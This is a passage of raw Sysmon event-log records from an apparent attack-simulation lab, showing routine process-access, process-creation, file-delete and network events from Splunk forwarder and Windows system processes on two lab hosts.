Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3295492EDC1573AB957602AC8DA6EC17,SHA256=FA9252FAD9F59A68751BC0027201AF380EA9EB3752E589542A2D21B53C0D46C7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000293397Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:01.446{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293396Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:01.446{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293395Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:01.446{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293394Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:01.446{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293393Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:01.446{C8EA50B7-F11C-6215-0500-000000003802}4122608C:\Windows\system32\csrss.exe{C8EA50B7-1339-6216-6106-000000003802}6860C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000293392Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:01.446{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1339-6216-6106-000000003802}6860C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000293391Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:01.448{C8EA50B7-1339-6216-6106-000000003802}6860C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000293390Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:01.346{C8EA50B7-F11F-6215-0D00-000000003802}8883340C:\Windows\system32\svchost.exe{C8EA50B7-F11F-6215-1000-000000003802}364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293409Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:02.545{C8EA50B7-133A-6216-6206-000000003802}70007116C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000293408Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:02.499{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=75AEB31C7E7D530CF736C3875F5F8C4A,SHA256=BDFD8AD7B92CC6FF22E307582E9FCB81C3BDBFDA3438C0D49DF21BB447937626,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217950Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:02.380{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A84E3FA1971B3B31B0D51B4E41270041,SHA256=ACE724587DA1A6EDDA672140A86868ED0C50948FA90B2327009C03E538CDF2AA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000293407Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:02.299{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-133A-6216-6206-000000003802}7000C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293406Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:02.297{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293405Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:02.297{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293404Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:02.297{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293403Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:02.297{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293402Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:02.296{C8EA50B7-F11C-6215-0500-000000003802}412528C:\Windows\system32\csrss.exe{C8EA50B7-133A-6216-6206-000000003802}7000C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000293401Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:02.295{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-133A-6216-6206-000000003802}7000C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000293400Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:02.294{C8EA50B7-133A-6216-6206-000000003802}7000C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000293411Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:03.530{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AB6BDB3527A771393EB77239E44643DE,SHA256=AD22D02449599A7760678F9D7544048EED49E7702A792AACFEE5DCA71B2D28B5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217952Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:03.395{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=05AB93D477635B6AC97948D53B9778B9,SHA256=73E42E449AED81E63BDA9B1C8F6E0855E0330C0D3FB5FEB056A8F550D0B87811,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000293410Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:00.647{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53797-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x8000000000000000217951Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:00.675{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51426-false10.0.1.12-8000- 23542300x8000000000000000217953Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:04.598{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E7D2A3A07839A3E4991EC31FF0B8B95C,SHA256=AAE759FCEC310487799271ECC638E47AC7D85570CF1B93F9D902EC8321F7AA59,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000293421Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:04.787{C8EA50B7-F11F-6215-0D00-000000003802}8883340C:\Windows\system32\svchost.exe{C8EA50B7-F11F-6215-1000-000000003802}364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000293420Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:04.556{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9548B03B36C04C52B07A4B0297088C8B,SHA256=9C4BE74A685DA81449378C531BA70B7D58E941362E4EB300CEBCC5E6095A4078,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000293419Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:04.256{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-133C-6216-6306-000000003802}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293418Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:04.240{C8EA50B7-F11C-6215-0500-000000003802}412428C:\Windows\system32\csrss.exe{C8EA50B7-133C-6216-6306-000000003802}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000293417Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:04.240{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293416Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:04.240{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293415Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:04.240{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293414Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 